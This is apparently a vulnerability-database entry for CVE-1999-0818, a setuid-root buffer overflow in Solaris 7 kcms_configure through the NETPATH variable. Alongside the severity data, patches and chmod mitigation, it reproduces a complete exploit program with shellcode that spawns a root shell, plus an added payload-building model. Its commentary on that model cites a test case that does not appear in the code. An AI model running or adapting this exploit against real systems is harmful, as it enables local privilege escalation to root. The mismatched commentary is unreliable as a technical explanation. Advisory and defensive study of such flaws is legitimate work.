CVE-1999-0818
CVSS 7.2
Published: 1999-11-20 00:00:00
Revised: 2008-09-09 08:35:41

[Original] Buffer overflow in Solaris kcms_configure via a long NETPATH environmental variable.


[CNNVD] Solaris kcms_configure vulnerability (CNNVD-199911-065)

        Solaris kcms_configure has a buffer overflow vulnerability. It is triggered by an over-long NETPATH environment variable.

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [can bring the whole system down]
Access complexity: LOW [no special access conditions are needed to exploit]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [no authentication is needed to exploit]

- CPE (affected platforms and products)

cpe:/o:sun:solaris:7.0::x86
cpe:/o:sun:solaris:7.0

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0818
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0818
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199911-065
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/831
(UNKNOWN)  BID  831
http://www.securityfocus.com/templates/archive.pike?list=1&msg=38433B7F5A.53F4SHADOWPENGUIN@fox.nightland.net
(UNKNOWN)  BUGTRAQ  19991130 another hole of Solaris7 kcms_configure

- Vulnerability information

Solaris kcms_configure vulnerability
High severity; buffer overflow
1999-11-20 00:00:00 2005-10-20 00:00:00
Local
        Solaris kcms_configure has a buffer overflow vulnerability. It is triggered by an over-long NETPATH environment variable.

- Advisories and patches

        A temporary solution is to chmod 400 /usr/openwin/bin/kcms_configure. This will prevent local users from running the affected program (mode 0400 also clears the setuid bit, so even if the file were later made executable again the root privilege would not come back until the mode is explicitly restored).
        Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

        Sun Solaris 7.0_x86
          • Sun patch 107339-01 (x86)

        Sun Solaris 7.0
          • Sun patch 107337-01 (sparc)

- Vulnerability information (19647)

Solaris 7.0 kcms_configure (EDBID: 19647)
Platform: solaris    Type: local
Published: 1999-11-30    Verified
Port: 0    Author: UNYUN
Vulnerable app: N/A
source: http://www.securityfocus.com/bid/831/info

The binary kcms_configure, part of the Kodak Color Management System package shipped with OpenWindows (and ultimately, Solaris), is vulnerable to a local buffer overflow. The buffer into which the contents of the environment variable NETPATH are copied has a fixed length; if that length is exceeded the stack is corrupted and arbitrary code hidden inside the oversized value can be executed. kcms_configure is installed setuid root, so exploitation results in a local root compromise.

------ ex_kcms_configure86.c
/*=============================================================================
kcms_configure Exploit for Solaris7 Intel Edition
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN (shadowpenguin@backsection.net)
=============================================================================
*/
/* i386 only: the inline assembly and the hard-coded offsets below are for
   Solaris 7 x86. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define ENV "NETPATH="          /* the variable kcms_configure copies unchecked */
#define MAXBUF 3000             /* total length of "NETPATH=<payload>" */
#define RETADR 2088             /* offset of the overwritten return address */
#define RETOFS 0xad0            /* return address = ESP - RETOFS (inside the sled) */
#define FAKEADR 2076            /* offset of a pointer that is overwritten with ESP */
#define NOP 0x90

/* Read the current stack pointer. It is used as an estimate of where the
   target process will see its environment, and so the payload. */
unsigned long get_sp(void)
{
    unsigned long sp;
    __asm__(" movl %%esp,%0 " : "=r"(sp));
    return sp;
}

/* Shellcode; it ends in the "/bin/sh" string it execs. */
char exploit_code[] =
"\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0"
"\x8d\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff"
"\xeb\x18\x5e\x33\xc0\x33\xdb\xb3\x08\x2b\xf3\x88\x06\x50\x50\xb0"
"\x17\x9a\xff\xff\xff\xff\x07\xee\xeb\x05\xe8\xe3\xff\xff\xff"
"\x55\x8b\xec\x83\xec\x08\xeb\x50\x33\xc0\xb0\x3b\xeb\x16\xc3\x33"
"\xc0\x40\xeb\x10\xc3\x5e\x33\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88"
"\x7e\x06\xeb\x05\xe8\xec\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f"
"\xc3\x5e\x33\xc0\x89\x76\x08\x88\x46\x07\x89\x46\x0c\x50\x8d\x46"
"\x08\x50\x8b\x46\x08\x50\xe8\xbd\xff\xff\xff\x83\xc4\x0c\x6a\x01"
"\xe8\xba\xff\xff\xff\x83\xc4\x04\xe8\xd4\xff\xff\xff/bin/sh";

int main(void)
{
    char buf[MAXBUF];
    unsigned int ip, sp;

    putenv("LANG=");              /* keep the environment layout predictable */
    sp = get_sp();
    printf("ESP=0x%x\n", sp);

    memset(buf, NOP, MAXBUF);     /* NOP sled everywhere that is not overwritten below */

    /* pointer slot: overwritten with an address that is safely on the stack */
    ip = sp;
    buf[FAKEADR]     = ip & 0xff;
    buf[FAKEADR + 1] = (ip >> 8) & 0xff;
    buf[FAKEADR + 2] = (ip >> 16) & 0xff;
    buf[FAKEADR + 3] = (ip >> 24) & 0xff;

    /* saved return address: ESP - RETOFS lands in the sled ahead of the shellcode */
    ip = sp - RETOFS;
    buf[RETADR]     = ip & 0xff;
    buf[RETADR + 1] = (ip >> 8) & 0xff;
    buf[RETADR + 2] = (ip >> 16) & 0xff;
    buf[RETADR + 3] = (ip >> 24) & 0xff;

    /* shellcode near the end of the sled; strncpy with strlen() deliberately
       leaves out the terminating NUL so the sled is not cut short */
    strncpy(buf + 2500, exploit_code, strlen(exploit_code));

    strncpy(buf, ENV, strlen(ENV));   /* "NETPATH=" prefix, again without a NUL */
    buf[MAXBUF - 1] = 0;
    putenv(buf);

    execl("/usr/openwin/bin/kcms_configure", "kcms_configure", "1", (char *)0);
    return 1;                          /* only reached if execl fails */
}
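The discussion and the exploit above describe the flaw in two halves: an environment value copied into a fixed-size stack buffer with no length check, and a payload (NOP sled, planted return address, shellcode) that is shaped to land on the saved return address. The following C model, added here and not part of the original entry, Sun's code or the Shadow Penguin exploit, puts the vulnerable copy beside its hardened form and builds a payload in the same shape as ex_kcms_configure86.c against a toy frame. The 64-byte buffer, the frame layout and the address constants are assumptions chosen for the model; the real kcms_configure buffer and offsets are not on this page. The copy in the model is clamped to its own struct only so the harness never writes outside its object.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Toy model of the target frame: a fixed-size destination for the NETPATH
   value, followed (as an i386 prologue lays them out) by the saved frame
   pointer and the return address.  Sizes are assumptions for this example. */
#define NETPATH_BUF 64
#define NOP 0x90

struct frame {
    char     buf[NETPATH_BUF];   /* destination of the NETPATH copy */
    uint32_t saved_ebp;          /* what the prologue pushed just above buf */
    uint32_t ret_addr;           /* overwritten to hijack control flow */
};

/* Vulnerable pattern: copy the whole value, trusting its length.  The clamp
   to sizeof(struct frame) exists only so this harness never writes past its
   own object; the real program has no such clamp at all. */
int netpath_copy_unchecked(struct frame *f, const char *value)
{
    size_t n = strlen(value) + 1;
    if (n > sizeof *f)
        n = sizeof *f;
    memcpy((char *)f, value, n);     /* runs past buf into saved_ebp and ret_addr */
    return 0;
}

/* Hardened form: refuse anything that does not fit, then copy a bounded amount. */
int netpath_copy_checked(struct frame *f, const char *value)
{
    size_t len = strlen(value);
    if (len >= NETPATH_BUF)
        return -1;                   /* caller must treat this as fatal */
    memcpy(f->buf, value, len + 1);
    return 0;
}

/* Returns 1 if the checked copy accepts `value` and stores it intact. */
int checked_accepts(const char *value)
{
    struct frame f;
    memset(&f, 0, sizeof f);
    return netpath_copy_checked(&f, value) == 0 && strcmp(f.buf, value) == 0;
}

/* Build a payload in the shape the exploit uses: a NOP sled with a
   little-endian address planted at ret_off.  No byte may be 0x00 before the
   end, because the copy in the target stops at the first NUL. */
int build_payload(char *out, size_t outsz, size_t ret_off, uint32_t ret)
{
    if (ret_off + 4 >= outsz)
        return -1;
    memset(out, NOP, outsz);
    out[ret_off]     = ret & 0xff;
    out[ret_off + 1] = (ret >> 8) & 0xff;
    out[ret_off + 2] = (ret >> 16) & 0xff;
    out[ret_off + 3] = (ret >> 24) & 0xff;
    out[outsz - 1] = 0;
    for (size_t i = 0; i < outsz - 1; i++)
        if (out[i] == 0)
            return -1;               /* address contains a NUL byte: unusable */
    return 0;
}

/* Run one constructed value through both copies.  Returns 1 when the unchecked
   copy replaced ret_addr with `want` while the checked copy rejected the value
   and left its frame untouched.  Compares natively, so it assumes a
   little-endian host like the i386 target. */
int demo(uint32_t want)
{
    struct frame vuln, safe;
    char payload[128];               /* constructed input, longer than buf */
    const uint32_t orig_ret = 0x08048000u;

    memset(&vuln, 0, sizeof vuln);
    memset(&safe, 0, sizeof safe);
    vuln.ret_addr = safe.ret_addr = orig_ret;

    if (build_payload(payload, sizeof payload,
                      offsetof(struct frame, ret_addr), want) != 0)
        return 0;

    netpath_copy_unchecked(&vuln, payload);
    int rejected = netpath_copy_checked(&safe, payload);

    return vuln.ret_addr == want && rejected == -1 && safe.ret_addr == orig_ret;
}

int main(void)
{
    /* 0xbffffad0 mirrors the exploit's "ESP - 0xad0" style of target */
    printf("unchecked copy hijacked the return address: %s\n",
           demo(0xbffffad0u) ? "yes" : "no");
    return 0;
}
```

The interesting failure mode is the second case in the test: an address with a zero byte (0xbffff000) cannot be planted this way because the target's copy stops at the NUL, which is why the exploit subtracts an odd-looking 0xad0 from ESP and terminates the whole 3000-byte string only at its very end.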

- Vulnerability information

1783
Solaris kcms_configure NETPATH Environment Variable Handling Local Overflow
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

kcms_configure as included with Solaris 7 and 8 allows a local attacker to gain additional privileges via a buffer overflow in its handling of the NETPATH environment variable.

- Timeline

1999-11-30 Unknown
1999-11-30 Unknown

- Solution

Products

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Solaris kcms_configure
Class: Boundary Condition Error    Bugtraq ID: 831
Remote: No    Local: Yes
Published: 1999-11-30 12:00:00    Updated: 2009-07-11 12:56:00
This was first posted to BugTraq by UNYUN <shadowpenguin@backsection.net> on November 30, 1999.

- Affected program versions

Sun Solaris 7.0_x86
Sun Solaris 7.0

- Discussion

The binary kcms_configure, part of the Kodak Color Management System package shipped with OpenWindows (and ultimately, Solaris), is vulnerable to a local buffer overflow. The buffer into which the contents of the environment variable NETPATH are copied has a fixed length; if that length is exceeded the stack is corrupted and arbitrary code hidden inside the oversized value can be executed. kcms_configure is installed setuid root, so exploitation results in a local root compromise.

- Exploit

The exploit attached to BID 831 is the same ex_kcms_configure86.c by UNYUN (The Shadow Penguin Security) that is reproduced in full in the EDBID 19647 section above; it is not repeated here.

- Solution

The same as the advisories and patches section above: chmod 400 /usr/openwin/bin/kcms_configure as a temporary measure, and Sun patches 107339-01 (Solaris 7.0 x86) and 107337-01 (Solaris 7.0 sparc).
